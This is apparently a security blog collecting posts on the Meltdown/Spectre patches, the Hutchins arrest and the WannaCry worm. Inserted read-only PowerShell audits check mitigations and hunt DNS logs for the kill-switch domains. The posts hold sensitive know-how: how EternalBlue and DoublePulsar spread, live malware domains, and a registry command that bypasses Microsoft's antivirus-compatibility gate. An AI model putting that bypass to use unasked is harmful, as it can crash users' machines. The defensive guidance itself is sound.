The microcode updates can be obtained directly from Intel, and Bleeping Computer has provided instructions and a video to walk admins through the install process here. It should be noted that issues have already been reported with the updates, specifically unwanted reboots: Intel initially confirmed that machines with Broadwell and Haswell CPUs were affected, and later acknowledged that machines with newer processors were affected as well.

Windows users need to wait until Microsoft finalizes testing the microcode and releases an additional update to add in these further mitigations.

Known issues:

  • Older Intel Broadwell and Haswell CPUs experiencing sudden reboots: Intel has confirmed receiving reports of glitches resulting from the firmware update on systems with Broadwell and Haswell CPUs.
  • Newer Intel CPUs also experiencing sudden reboots: Intel has confirmed the firmware update is causing machines with Ivy Bridge, Sandy Bridge, Skylake and Kaby Lake processors to suffer sudden reboots too.
  • Performance impact: information on the potential performance implications of these updates has been inconsistent, but Intel has most recently said the patches slow processors by six percent in certain situations. Intel has shared more detail on the impact for specific workloads in a chart you can find here.

NOTE: Intel has currently requested customers stop installing its firmware update, they are aware of the issue and are working on a resolution


AMD has officially acknowledged that its processors are vulnerable to both variants of Spectre, but states that they are not vulnerable to Meltdown. While AMD says OS patches are sufficient to mitigate the first variant of Spectre, it has also started rolling out optional microcode updates, starting last week; the initial releases are focused on Ryzen and EPYC processors.

Known issues:

  • Windows OS update compatibility issues: the AMD boot-loop problem with the January Windows security update, and Microsoft’s staged resumption of the rollout from 18 January, are covered under “Known issues” in the Windows updates section above.


Right now the priority is not to stress and rush out to deploy every update you can find; instead take a step back, assess the situation and work out how best to mitigate these vulnerabilities. At present I would concentrate on the operating system and browser updates, once your antivirus is up to date and compatible. The firmware updates are fresh and seem to be experiencing more issues, so I would hold off on them a little longer while the dust settles and their stability is confirmed. As always, test before mass deployment and make sure you have a proven, restorable backup to revert to in case you encounter any issues.

Fresh information surrounding Meltdown and Spectre is coming out everyday, so there is likely much more to come. I will be following closely and providing updates as soon as possible.

CPU Flaws – Meltdown and Spectre

Two vulnerabilities called Meltdown and Spectre have recently been disclosed; you have probably seen them in the news over the past 24 hours, since they affect most modern processors and allow malicious programs to steal information from the memory of other programs. This means a malicious program could steal passwords, account information, encryption keys, or in theory anything held in another process’s memory.

Most vendors have started to release information surrounding how customers can protect themselves from Spectre or Meltdown and to what extents they are vulnerable. To make it easier to find this information, I will be adding some key information and links to various advisories as they are released.



CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754


CPU hardware implementations are vulnerable to side-channel attacks. These vulnerabilities are referred to as Meltdown (// and Spectre (//


An attacker able to execute code with user privileges can achieve various impacts, such as reading otherwise protected kernel memory and bypassing KASLR.

CVSS Metrics (Learn More (//

Group | Score | Vector
Base | 1.5 | AV:L/AC:M/Au:S/C:P/I:N/A:N
Temporal | 1.2 | E:POC/RL:OF/RC:C
Environmental | 2.0 | CDP:ND/TD:H/CR:H/IR:ND/AR:ND



1. Update OS’s – this will mediate the issue so that the Operating system itself cannot be exploited but if the Operating System is re-installed or the update removed then the device would still be vulnerable.

2. Apply Firmware updates from the OEM (CPU Microcode) when/if available – this should offer a full resolution to the vulnerabilities.

3. Replace the CPU with one that isn't vulnerable – the best option for ensuring you are not vulnerable, but not the easiest or potentially the quickest solution.

Windows Server and Client – antivirus


“The compatibility issue is caused when anti-virus applications make unsupported calls into Windows kernel memory. These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot. To help prevent stop errors caused by incompatible anti-virus applications, Microsoft is only offering the Windows security updates released on January 3, 2018 to devices running anti-virus software from partners who have confirmed their software is compatible with the January 2018 Windows operating system security update.”

^^ We need to test and potentially contact AV providers to check their product is compatible, and make sure they add the registry key to say so. Otherwise we aren't getting protected.


Antivirus support chart

Microsoft will only distribute the security update released on January 3rd 2018 to devices where a particular registry key has been added by an installed antivirus vendor. Kevin Beaumont has created a spreadsheet to keep track of the antivirus vendors and whether they set this key: //


To manually add the registry key and obtain the update now, enter the following into a command prompt window (as admin) and then run Windows Update ( does not accept any liability for any issues that could arise as a result and would recommend you contact Microsoft and your AV provider prior to doing this):

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d "0x00000000" /f



Windows Server

Microsoft guidance for Windows Server: //

Important note: the patch is disabled by default for performance reasons.

To enable the mitigations:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
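Before touching either of these keys it is worth knowing what a given host currently has. The script below is an added example (not from the original post or from Microsoft) that reads the two locations described above in one go: the QualityCompat value that gates delivery of the January update, and the FeatureSettingsOverride / FeatureSettingsOverrideMask pair that the post says must be 0 and 3 for the Windows Server mitigations to be active. It only reads the registry and changes nothing; the output field names are my own.

```powershell
# Added example, not from the original post: read-only audit of the registry values
# discussed above. Run from an elevated PowerShell prompt on the host being checked.

$compatPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat'
$compatName = 'cadca5fe-87d3-4b96-b7fb-a231484277cc'
$mmPath     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist, instead of throwing,
    # so a missing value is reported rather than aborting the audit.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

$compat   = Get-RegValue -Path $compatPath -Name $compatName
$override = Get-RegValue -Path $mmPath -Name 'FeatureSettingsOverride'
$mask     = Get-RegValue -Path $mmPath -Name 'FeatureSettingsOverrideMask'

# The post's "enable" state is Override = 0 with Mask = 3. Any other combination,
# including the values being absent (the default, which on Windows Server the post
# states is disabled), is reported as not enabled.
$result = [pscustomobject]@{
    ComputerName                = $env:COMPUTERNAME
    QualityCompatSet            = ($null -ne $compat)   # AV vendor (or an admin) has flagged compatibility
    QualityCompatValue          = $compat
    FeatureSettingsOverride     = $override
    FeatureSettingsOverrideMask = $mask
    ServerMitigationsEnabled    = ($override -eq 0 -and $mask -eq 3)
}

$result | Format-List
```

If QualityCompatSet comes back false, Windows Update will not offer the January update on that host until the AV vendor (or you, per the reg add command above) sets the value; if ServerMitigationsEnabled is false on a server that already has the update installed, the two reg add commands above are what turns the mitigations on.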

MS SQL Server

SQL specific information to come out later today

Windows Client

Microsoft guidance for Windows Client: //

Mozilla Firefox

Firefox will be adding mitigations against websites trying to exploit these flaws in Firefox 57: //

Google Chrome

Chrome 64, due late January, will include protection against websites trying to exploit these flaws: //

Microsoft Edge and Internet Explorer 11

Microsoft released an update yesterday which includes protection against websites trying to exploit these flaws: //

Amazon AWS – cloud

AWS has protected their customers: //


“The majority of Azure infrastructure has already been updated to address this vulnerability. Some aspects of Azure are still being updated and require a reboot of customer VMs for the security update to take effect. Many of you have received notification in recent weeks of a planned maintenance on Azure and have already rebooted your VMs to apply the fix, and no further action by you is required.”


ETA for completion of hypervisor-level patching: 24-48 hours. MS will try to respect availability sets (if configured). Originally the maintenance was planned for the fabric to be updated over the following couple of weeks, but they have had to condense it, so they can't guarantee anything but will try to respect availability sets.

Reboots can take place at any time (e.g. they could reboot Azure VMs during business hours).

AMD processors

Google Project Zero (GPZ) Research   Title                     Details
Variant One                          Bounds Check Bypass       Resolved by software / OS updates to be made available by system vendors and manufacturers. Negligible performance impact expected.
Variant Two                          Branch Target Injection   Differences in AMD architecture mean there is a near zero risk of exploitation of this variant. Vulnerability to Variant 2 has not been demonstrated on AMD processors to date.
Variant Three                        Rogue Data Cache Load     Zero AMD vulnerability due to AMD architecture differences.

The full advisory can be found here: //

Tom Lendacky, a software engineer at AMD, posted an email to the Linux Kernel Mailing List stating:

“AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against.  The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

Disable page table isolation by default on AMD processors by not setting the X86_BUG_CPU_INSECURE feature, which controls whether X86_FEATURE_PTI is set.”

You can read the full post here: //


The Android team has updated their January 2018 bulletin with the following note:

“CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754, a set of vulnerabilities related to speculative execution in processors, have been publicly disclosed. Android is unaware of any successful reproduction of these vulnerabilities that would allow unauthorized information disclosure on any ARM-based Android device.

To provide additional protection, the update for CVE-2017-13218 included in this bulletin reduces access to high-precision timers, which helps limit side channel attacks (such as CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754) of all known variants of ARM processors.

We encourage Android users to accept available security updates to their devices. See the Google security blog for more details.”

The full bulletin can be found here: //


Apple has announced that all Mac systems and iOS devices are affected, with the following statement.

“Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2 to help defend against Meltdown. Apple Watch is not affected by Meltdown. In the coming days we plan to release mitigations in Safari to help defend against Spectre. We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, macOS, tvOS, and watchOS.” //

Xen hypervisors



Suggested to patch these ASAP (currently waiting to see if there are any issues) if you use the hypervisor as a security layer (e.g. a bank or cloud provider). Advisory and patches: //


WannaCry accidental hero MalwareTech arrested by FBI for role in Kronos Trojan

The UK-based Security Researcher who uses the handle @MalwareTechBlog (aka Marcus Hutchins), and who became the self-professed accidental hero during the recent WannaCry outbreak that took place back in May, has been arrested by the FBI for his involvement in the Kronos malware campaign that took place back in 2014-2015.

Yesterday, the FBI detained Marcus Hutchins after the DEF CON hacking conference in Las Vegas as he attempted to fly back home to London, where he works as a researcher for the Cyber Security firm Kryptos Logic. Shortly after his arrest, the Department of Justice unsealed an indictment against him. The indictment charges him with involvement in creating the Kronos banking trojan, a piece of malware used to steal banking credentials in 2014 and 2015 that was designed to spread via emails, gathering the financial details of its victims as it did. The charge also states that he was supposedly involved in a conspiracy to sell it for $3,000 on dark web markets like AlphaBay.

The news of Marcus Hutchins' arrest has shocked much of the Cyber Security community. Marcus is well known, especially recently with his rise to fame in stopping the WannaCry outbreak, and is a well-respected person within the community, so this comes as quite damning news. It is not yet known exactly what evidence the FBI have on Marcus, but it could have come from last month's FBI and Europol seizure of the servers of AlphaBay, which happens to be the site mentioned in the indictment.

Friends of Marcus have reported he is currently held at the FBI's Las Vegas field office, but the FBI is not releasing any comments at this time. As yet the evidence is unclear; judging by the indictment, it seems the FBI believe Marcus built Kronos and an as-yet-unnamed co-conspirator released a video demo and sought to sell it. Looking back, we know that Marcus was researching Kronos around that time, as he sought to get hold of a sample just as he did with WannaCry.

Let's face it, the FBI has a history of incorrectly punishing security professionals who are doing good, so personally I am holding out on any judgment, and ultimately I want to know what evidence the FBI claim to have.

You're allowed to WannaCry now as it's not over!

Friday is typically a day when everyone's thoughts are on the weekend: time to relax, time to escape from work for a precious two days. Friday 12th May 2017 was not one of those days; that Friday the RansomWare game was changed. Enter "WannaCry".

As this particular Friday unravelled, computer systems around the world were being taken down, from Telefonica in Spain to the NHS in the UK and FedEx in the US. My own first thoughts when I saw on the news that the NHS was facing major systems outages due to a new RansomWare strain were first "oh great, another variant" and second "I wonder how it got in and spread so quickly; it almost looks like a coordinated attack given how much of the NHS has been hit". News about it spread quickly, the name was out for this new malware, "WannaCry" (also known as "WCry" and "WannaDecrypt0r"), and by the evening everyone had heard of it.

WannaCry is just the payload: once that payload is delivered the target system is encrypted and a message is displayed ordering you to pay to get your files back, so the payload itself is a pretty standard form of RansomWare. The intriguing part is the delivery system, which makes use of the EternalBlue exploit from the NSA toolkit released last month; via this exploit the payload can then be spread to nearly any Windows device on the same network as the infected machine. EternalBlue gives the malware the capability to scan heavily over TCP port 445 (Server Message Block/SMB) and spread like a worm: it compromises hosts, encrypts the files stored on them and demands a ransom payment in Bitcoin, all the while scanning and spreading further, allowing the payload to move quickly around the network with no admin credentials required. An important note is that the malware is not only able to spread via internal networks but also to externally facing hosts across the internet.

WannaCry primarily utilizes the EternalBlue exploit, but it is also used in conjunction with the DoublePulsar backdoor. EternalBlue is used for the initial exploitation of the SMB vulnerability; if that succeeds, the DoublePulsar backdoor is implanted, which in turn is used to install the malware. Microsoft released security patches back in March for all Operating Systems currently in support and extended support. Although this resolves the EternalBlue exploit, it does not necessarily mean you are protected, as WannaCry is designed so that if the EternalBlue exploit fails it will proceed to check whether the target already has the DoublePulsar backdoor installed. This could have been installed prior to the patch by another hacker, even the NSA, since this was originally part of their hacking toolkit before ShadowBrokers publicly released it.

On Friday evening the first variant was halted by the British security researcher MalwareTechBlog, who after analyzing some of the code found it pointed to an unregistered domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea [dot] com) and so decided to buy the domain and sinkhole it. Now maybe I am pessimistic, but upon hearing this I immediately thought one thing: "it's not over, this is just the start". Over the weekend I started to gather more and more information to understand it. The logical next step for the WannaCry creators is to change the kill-switch or to remove it entirely, and without a kill-switch this would be a complete nightmare for all sysadmins around the world.

Throughout the weekend Security Researchers have been working to get hold of samples to break them down and understand them. One researcher from France who uses the Twitter handle @benkow_ discovered a new variant, WannaCrypt0r 2.0, and sent it on to another IT Security Researcher, Matthieu Suiche, for an in-depth analysis. Upon analyzing it, Matthieu again discovered a kill-switch, but this one linked to another domain (ifferfsodp9ifjaposdfjhgosurijfaewrwergwea [dot] com). Matthieu has since added a post to his blog explaining how he found it and registered the domain.

Working with MalwareTech, Matthieu transferred this additional domain to MalwareTech’s sinkhole, to which MalwareTech posted the below to Twitter.

“Thanks to @benkow_ who found what looks like a new ‘kill switch’ domain and @msuiche who registered it and transferred it to our sinkhole.”

Earlier I thought "it's not over" and it appears I might be right. The predictions that the fast-spreading WannaCry RansomWare would quickly evolve to get around its domain-based kill-switch were everywhere, and, well... the predictions are starting to come true. We are already seeing reports of different domain names being used, and a few where researchers have claimed to have found samples without any kill-switch whatsoever (these researchers have since backtracked, and it looks like they might not have been using a fresh sample from the wild). I still believe that the kill-switch will be removed; it might not be done by the original creators but by a copycat group, but the exploits and code are out there so it's just a matter of time.
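One practical consequence of the kill-switch mechanism described above is that a host which looked up either of those two domains is a host on which the worm actually ran its check, whether or not the sinkhole then stopped it. The script below is an added example (not from the original post, nor from MalwareTech's or Matthieu Suiche's write-ups) that hunts a DNS query log for those lookups and summarises them per client. The log lines are constructed for the example, and the assumed field layout (date, time, client IP, record type, query name) should be adapted to whatever your resolver actually writes.

```powershell
# Added example, not from the original post: find hosts that resolved a WannaCry
# kill-switch domain. Assumes a whitespace-separated log of
#   <date> <time> <client-ip> <type> <query-name>
# which is a constructed layout; real resolvers differ, so adjust the field indexes.

$killSwitchDomains = @(
    'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com',
    'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com'
)

# Constructed sample log: two clients query the kill-switch domains, one is clean.
$sampleLog = @'
2017-05-12 14:03:11 10.0.5.21 A www.example.com
2017-05-12 14:03:15 10.0.5.44 A iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2017-05-12 14:03:19 10.0.5.44 A iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2017-05-12 14:04:02 10.0.7.9  A ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2017-05-12 14:04:30 10.0.5.21 A update.example.net
'@ -split "`n"

function Find-KillSwitchLookups {
    param([string[]]$Lines, [string[]]$Domains)

    $hits = foreach ($line in $Lines) {
        $fields = $line.Trim() -split '\s+'
        if ($fields.Count -lt 5) { continue }          # skip blank or malformed lines
        # Normalise the query name: strip a trailing dot and lower-case it so a
        # resolver that logs FQDNs with the root dot still matches.
        $qname = $fields[4].TrimEnd('.').ToLowerInvariant()
        if ($Domains -contains $qname) {
            [pscustomobject]@{
                Time   = "$($fields[0]) $($fields[1])"
                Client = $fields[2]
                Query  = $qname
            }
        }
    }

    # One row per client (first lookup, count, which domains) keeps the output
    # short even on a large log, and the client list is what you isolate.
    $hits | Group-Object Client | ForEach-Object {
        [pscustomobject]@{
            Client    = $_.Name
            FirstSeen = ($_.Group | Sort-Object Time | Select-Object -First 1).Time
            Lookups   = $_.Count
            Domains   = ($_.Group.Query | Sort-Object -Unique) -join ', '
        }
    }
}

Find-KillSwitchLookups -Lines $sampleLog -Domains $killSwitchDomains | Format-Table -AutoSize
```

On the constructed log this lists 10.0.5.44 (two lookups of the first domain) and 10.0.7.9 (one lookup of the second) and nothing for 10.0.5.21. A hit means the worm executed on that client and is a host to pull off the network and examine, even if the sinkhole prevented encryption; to run it against a real log replace $sampleLog with Get-Content on the resolver's log file, and add any further kill-switch domains that get reported to $killSwitchDomains.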

The taking down of these kill-switches is just a temporary measure; one should expect new variants to be released, and as such security measures should be implemented now to prevent falling victim later.

  1. Do not open an unknown email
  2. Do not download files from an unknown email
  3. Do not click files from an unknown email
  4. Avoid visiting malicious sites
  5. Do not download software and apps from a third-party store/website
  6. Enable "Show hidden file extensions" and only open a file if it's the extension you expect
  7. Apply any pending software updates and keep them up-to date
  8. Make sure you are using a reputable security suite/Anti-Virus
  9. Back up your data on a regular basis
  10. Use System Restore to get back to a known-clean state

What additional steps should Microsoft users take?

Microsoft Windows is the ultimate target of this cyber attack, since WannaCry exploits a security flaw within the SMB protocol. To mitigate the risk, patch MS17-010 should be applied urgently if not already applied; to aid in this, please find below the direct links to each download from Microsoft:

Windows XP SP3 //

Windows Vista x86 //

Windows Vista x64 //

Windows 7 x64 //

Windows 7 x86 //

Windows 8 //

Windows 8.1 //

Windows 10 //

Windows 2003 x86 //

Windows 2003 x64 //

Windows 2008 //

Windows 2008R2 //

Windows 2012 //

Windows 2012R2 //

Windows 2016 //

WannaCRY and the DoublePulsar Exploit

As many saw yesterday, the NHS faced a major outage and they were not alone: yesterday saw a mass outbreak of a new strain of RansomWare called "WannaCRY" (aka #WanaCypt0r aka #WCry). This may act like normal RansomWare (in the sense that it encrypts all your files and demands a Ransom) but it does not necessarily get into systems in the way we have seen before.

On April 14th, 2017 some of you may have seen that the group "Shadow Brokers" released a collection of tools that the NSA was using for hacking and taking unrestricted control of systems around the world; they did try to auction this off last year but were unsuccessful and so chose to release it to all. Within this collection of tools is one that enabled yesterday's global attack. It has been dubbed "EternalBlue" and uses the SMBv1 and SMBv2 protocol; when paired with "DoublePulsar" (also in the NSA toolkit), DoublePulsar can then inject DLLs into the target system, enabling the attacker to take full control of it. To see how it works check out this link.

This is a very serious attack vector and Microsoft released a patch for it on March 14th (before Shadow Brokers released the tools to all); the Microsoft patch is MS17-010, and a breakdown of it can be found here.

Given the seriousness of this attack vector it is imperative to ensure that all of your business and personal Windows devices are patched and up to date. Microsoft have also released patches last night for some EOL (End of Life) Operating Systems to try and minimize the risk to customer systems. The EOL devices added to receive these patches are Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.
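"Patched and up to date" is easy to say and harder to confirm across an estate, and the two facts that decide exposure to this vector are whether the SMBv1 server is still enabled and whether the MS17-010 update is present. The script below is an added example (not from the original post or from Microsoft) that audits both on a Windows 8 / Server 2012 or later host using the built-in SmbShare cmdlets. MS17-010 ships as a different KB per operating system and the post does not list them, so $Ms17010Kb is a placeholder to fill in from the Microsoft bulletin before trusting the Ms17010Installed result.

```powershell
# Added example, not from the original post: read-only audit of SMBv1 state and
# MS17-010 presence. Requires the SmbShare module (Windows 8 / Server 2012 and later);
# run from an elevated prompt.

$Ms17010Kb = 'KB0000000'   # PLACEHOLDER: set to the MS17-010 KB number for this OS

# Server-side SMBv1 switch, and the update check.
$smb    = Get-SmbServerConfiguration
$hotfix = Get-HotFix -Id $Ms17010Kb -ErrorAction SilentlyContinue

# Sessions still negotiating an SMB 1.x dialect are the clients that would break
# if SMBv1 were turned off, so list them before changing anything.
$smb1Sessions = Get-SmbSession -ErrorAction SilentlyContinue |
    Where-Object { $_.Dialect -like '1.*' }

[pscustomobject]@{
    ComputerName      = $env:COMPUTERNAME
    Smb1ServerEnabled = $smb.EnableSMB1Protocol
    Smb1ClientsActive = @($smb1Sessions).Count
    Smb1Clients       = (@($smb1Sessions).ClientComputerName | Sort-Object -Unique) -join ', '
    Ms17010Installed  = ($null -ne $hotfix)
    InstalledOn       = $hotfix.InstalledOn
} | Format-List

# Hardening step, left commented out so the audit stays read-only. Disable SMBv1
# only once Smb1ClientsActive is zero or those clients have been dealt with:
# Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
```

A host reporting Smb1ServerEnabled true and Ms17010Installed false is exposed to exactly the EternalBlue path the post describes; note that the update check only tells you the patch is present, not whether DoublePulsar was already implanted beforehand, which is the caveat raised in the previous post.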

Extract from Microsoft Statement: “Given the potential impact to customers and their businesses, we made the decision to make the Security Update for platforms in custom support only, Windows XP, Windows 8, and Windows Server 2003, broadly available for download. This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind.”

MalwareTech has also released a blog post explaining how he stopped WannaCRY in its tracks; to read it, follow this link.